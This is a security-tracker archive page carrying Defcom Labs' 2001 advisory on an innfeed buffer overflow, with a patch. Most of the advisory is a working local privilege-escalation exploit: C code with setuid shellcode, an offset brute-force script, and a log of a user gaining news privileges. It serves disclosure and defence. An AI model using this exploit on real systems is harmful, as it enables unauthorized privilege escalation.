SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (News)  >   INNfeed Vendors:   ISC (Internet Software Consortium)
Innfeed Allows Local Users to Execute Arbitrary Code on the Server Under the News Group Privileges
SecurityTracker Alert ID:  1001353
SecurityTracker URL:  http://securitytracker.com/id/1001353
CVE Reference:   CVE-2001-1442   (Links to External Site)
Updated:  May 12 2008
Original Entry Date:  Apr 18 2001
Impact:   Execution of arbitrary code via local system, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   Defcom Labs issued an advisory (def-2001-19) for "innfeed" warning that it allows local users to execute arbitrary code on the server. Innfeed sends news between hosts using the Network News Transfer Protocol (NNTP).

Defcom reports that there is no bounds checking on the innfeed program when using the -c flag, allowing a buffer overflow to be triggered.

The buffer overflow exists in the logOrPrint() function on a vsprint() call. The local user can trigger the overflow to obtain the news group id.

A description of the offending code, a demonstration exploit script, and a recommended patch is contained in the source message.

Impact:   A local user can cause arbitrary code to be executed on the server with news group id privileges.
Solution:   A patch has been developed. See the source message for the patch or contact your operating system vendor.
Vendor URL:  www.isc.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Mandriva/Mandrake), Linux (Red Hat Linux), Linux (Slackware)
Underlying OS Comments:  Slackware 7.1, Mandrake 7.0, RedHat 7.2 and older versions of those operating systems

Message History:   This archive entry has one or more follow-up message(s) listed below.
(A User Responds) Re: Innfeed Allows Local Users to Execute Arbitrary Code on the Server Under the News Group Privileges
A user reponds to note that this may be more of a documentation issue than a vulnerability.



 Source Message Contents

Subject:  Innfeed Buffer Overflow


======================================================================
                 Defcom Labs Advisory def-2001-19

                innfeed buffer overflow

Author: Enrique A. Sanchez Montellano <@defcom.com>
Author: Alex Hernandez <alex.hernandez@defcom.com>
Release Date: 2001-04-18
======================================================================
------------------------=[Brief Description]=-------------------------
innfeed is a program that implements the NNTP protocol for transerring
news between computers.

Due to no bounds checking on the innfeed program a buffer overflow
occurs while using the -c flag, thus rendering complete control
of the stack. And rendering news uid and gid.

------------------------=[Affected Systems]=--------------------------
Linux:
   Slackware 7.1 and older versions.
   Mandrake 7.0 and older versions.
   RedHat 7.2 and older versions.

----------------------=[Detailed Description]=------------------------
Due to no bounds checking on the logOrPrint() function on the vsprint()
a stack overflow occurs thus rendering the stack. The user then is able
to gain news id, in wich he can the trojan binaries to gain further
access to upgrade his priviledges.

Users trusted to group id can gain further access to news uid thus
gaining owner priviledges on the files and being able to trojan them
in some cases. And if root runs those binaries a root compromise might
be posible.

Offending code:
---------------

vsprintf (buffer,fmt,ap) ;

Example of exploitation:
------------------------

nahual@shell:~$ ls -al /usr/lib/news/bin/innfeed
-r-xr-x---   1 news     news       213124 Jun 14  2000
/usr/lib/news/bin/innfeed*
nahual@shell:~$ ls -al /usr/lib/news/bin/startinnfeed
-r-sr-x---   1 root     news        40796 Jun 14  2000
/usr/lib/news/bin/startinnfeed*
nahual@shell:~$ id
uid=1001(nahual) gid=100(users) groups=100(users),13(news)
nahual@shell:~$ ./x-innfeed
[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]
------------------------------------------------------------
[ + ] Found by:

[ + ] Alex Hernandez (alex.hernandez@defcom.com)
[ + ] Enrique Sanchez (@defcom.com ... Yes is just @defcom.com)
[ + ] Defcom Labs @ Spain ....
[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)

[ + ] Using address 0xbffff9e4
[ + ] Starting exploitation ...

bash$ id
uid=9(news) gid=13(news) groups=100(users),13(news)
bash$
----

Proof of concept code:
----------------------

--- x-startinnfeed.c ---
/*
  x-innfeed.c

  Buffer overflow in innfeed being called from startinnfeed renders
uid(news) gid(news), startinnfeed is suid root so I have to also check
if I can manage to get root out of this ....

  Enrique A. Sanchez Montellano
  (@defcom.com ... Yes is only @defcom.com)
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

#define OFFSET  0
#define ALIGN   0
#define BUFFER  470

// MANDRAKE, REDHAT, etc....

#ifdef REDHAT
/* optimized shellcode ;) (got rid of 2 bytes from aleph1's) */
//static char shellcode[]=
//"\xeb\x15\x5b\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
             "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
             "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
             "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

#endif

#ifdef SLACKWARE
/* optimized shellcode for slackware 7.0 (non setuid(getuid()) shell) */
static char shellcode[]=
"\xeb\x15\x5b\x89\x5b\x0b\x31\xc0\x88\x43\x0a\x89\x43\x0f\xb0\x0b\x8d\x4b\x0b\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/bash1";
#endif

unsigned long get_sp(void) {
  __asm__("movl %esp, %eax");
}

void usage(char *name) {
  printf("Usage: %s <offset> <align> <buffer>\n", name);
  printf("Defcom Labs @ Spain ...\n");
  printf("Enrique A. Sanchez Montellano (@defcom.com)\n");
  exit(0);
}

int main(int argc, char **argv) {
  char *code;
  int offset = OFFSET;
  int align = ALIGN;
  int buffer = BUFFER;
  unsigned long addr;
  int i;

  if(argc > 1) offset = atoi(argv[1]);
  if(argc > 2) align = atoi(argv[2]);
  if(argc > 3) buffer = atoi(argv[3]);

  code = (char *)malloc(buffer);

  printf("[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]\n");
  printf("------------------------------------------------------------\n");
  printf("[ + ] Found by: \n\n[ + ] Alex Hernandez
(alex.hernandez@defcom.com) \n[ + ] Enrique Sanchez (@defcom.com ... Yes
is just @defcom.com)\n");
  printf("[ + ] Defcom Labs @ Spain ....\n");
  printf("[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)\n\n");

  addr = get_sp() - offset;

  printf("[ + ] Using address 0x%x\n", addr);

  for(i = 0; i <= buffer; i += 4) {
   *(long *)&code[i] = 0x90909090;
  }

  *(long *)&code[buffer - 4] = addr;
  *(long *)&code[buffer - 8] = addr;

  memcpy(code + buffer - strlen(shellcode) -8 - align, shellcode,
strlen(shellcode));

  printf("[ + ] Starting exploitation ... \n\n");

  // REDHAT, MANDRAKE ...
#ifdef REDHAT
  execl("/usr/bin/startinnfeed", "/usr/bin/startinnfeed", "-c", code, NULL);
#endif

  // SLACKWARE
#ifdef SLACKWARE
  execl("/usr/lib/news/bin/startinnfeed",
"/usr/lib/news/bin/startinnfeed", "-c", code, NULL);
#endif

  return 0;
}

--- x-startinnfeed.c ---

--- brute.sh ---
#!/bin/ksh
L=-2000
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 1`
./x-startinnfeed $L
done
--- brute.sh ---

---------------------------=[Workaround]=-----------------------------
Defcom has issued a patch for the vulnerability:

---innfeed-overflow.patch---
210c210
<       vsprintf (buffer,fmt,ap) ;
---
 >       vsnprintf (buffer,512,fmt,ap) ;
---innfeed-overflow.patch---

The recomended action is to upgrade to version 2.3.1 wich is not
vulnerable to this attack due that you have to be news to execute the
script.

root should not run any of this commands as an administrative task
trusted users should do this.

-------------------------=[Vendor Response]=--------------------------
inn-bugs, Katshiro Kondou, and Russ Allbery responded in a fast
and swift way, answering questions.

Thank you to him and all the INN team for their time and responses.
======================================================================
        This release was brought to you by Defcom Labs @ Spain

             labs@defcom.com             www.defcom.com
======================================================================

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC